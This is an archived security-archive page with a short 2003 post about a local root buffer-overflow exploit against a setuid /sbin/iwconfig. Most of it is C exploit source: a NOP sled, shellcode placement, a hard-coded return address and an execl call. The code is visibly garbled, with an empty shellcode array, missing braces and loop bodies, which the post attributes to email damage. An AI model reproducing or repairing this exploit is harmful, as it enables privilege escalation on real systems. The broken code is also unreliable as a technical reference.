Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Linux :: Apps A-M :: bt1705.txt

iwconfig vulnerability - the last code was demaged sending by email

iwconfig is a tool that manipulate the basic wireless parameters, allowing 
privilege escalation due to buffer overflow vulnerability. The iwconfig is 
not setuid by default, but I have seen in several places it was. The flowing 
exploit has been released to test your servers. 

  Name: iw-config.c
  Copyright: !sh2k+!tc2k
  Author: heka
  Date: 11/11/2003
  Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, 
dunric, termid, kewlcat, JiNKS
  Description: /sbin/iwconfig - local root exploit
  iwconfig manipulate the basic wireless parameters 

#include <stdio.h>

#define BIN     "/sbin/iwconfig"

unsigned char shellcode[] =

main ()
   int x;
   char buf[97], out[1337], *buffer;
   unsigned long ret_add = 0xbffffbb8, *add_ptr ;
   buffer = buf;
   add_ptr = (long *)buffer;
   for (x=0; x<97-1; x+=4)
   memset ((char *)out, 0x90, 1337);
   memcpy ((char *)out + 333, shellcode, strlen(shellcode));
   memcpy((char *)out, "OUT=", 4);
   execl (BIN, BIN, buf, NULL);
   return 0;


Open WebMail Project (

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH